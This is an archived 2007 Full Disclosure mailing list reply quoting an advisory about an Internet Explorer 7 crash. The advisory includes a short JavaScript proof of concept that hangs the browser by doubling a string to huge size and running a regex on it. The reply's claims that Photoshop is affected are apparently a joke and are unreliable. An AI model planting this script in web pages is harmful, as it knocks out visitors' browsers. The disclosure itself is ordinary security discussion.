Full Disclosure mailing list archives
Re: Internet Explorer Crash
From: "Dr. Neal Krawetz, PhD" <neal.krawetz () mac hush com>
Date: Tue, 17 Apr 2007 17:53:34 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I have confirmed that both Adobe Photoshop 7.0 and 7.1 are vulnerable to this issue. However all versions of Paint Shop Pro that I tested are not vulnerable. I repeat, Paint Shop Pro is not vulnerable to this issue. Ubuntu is not vulnerable to this issue in any way. Good find buddy! - - Dr. Neal Krawetz, PhD http://www.hackerfactor.com/blog/ On Tue, 17 Apr 2007 13:09:50 -0400 "J. Oquendo" <sil () infiltrated net> wrote:
Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html <script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 9999999999999999999999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999 99999999999999999999999) z+=z; var boum = reg.exec(z); </script> Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams
-----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYlQWQACgkQDpFP8dW5K4Z/bQQAhmwJc2y9RBZ7nFAEWo4Q/aIpvwVj 7Xa+Ax+CUSe1O+hINFX5I+hLoPckPNVoC3YtPA7rQqT6dQ3xIubFgZAGFs62v7p936yi p4esv/frDaklOmlEGjVZqcoxJATwj8HBPthO3YZk5D1HRJhkQ0J72ucEkBgK6tw/YeuL dUoEASE= =FbVw -----END PGP SIGNATURE----- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/CAaCXv1R3e4Y8wdXYkvHiVBp8Vi7B9M9/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Internet Explorer Crash, (continued)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
- Re: Internet Explorer Crash Michal Majchrowicz (Apr 17)
- Re: Internet Explorer Crash Troy (Apr 17)
- Re: Internet Explorer Crash Kradorex Xeron (Apr 18)
- Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
- Re: Internet Explorer Crash Pavel Kankovsky (Apr 21)
- Re: Internet Explorer Crash cardoso (Apr 21)
- Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
- Message not available
- Re: Internet Explorer Crash Michele Cicciotti (Apr 18)
- Internet Explorer Crash carl hardwick (Apr 17)
- Re: Internet Explorer Crash 3APA3A (Apr 17)
- Re: Internet Explorer Crash Dr. Neal Krawetz, PhD (Apr 17)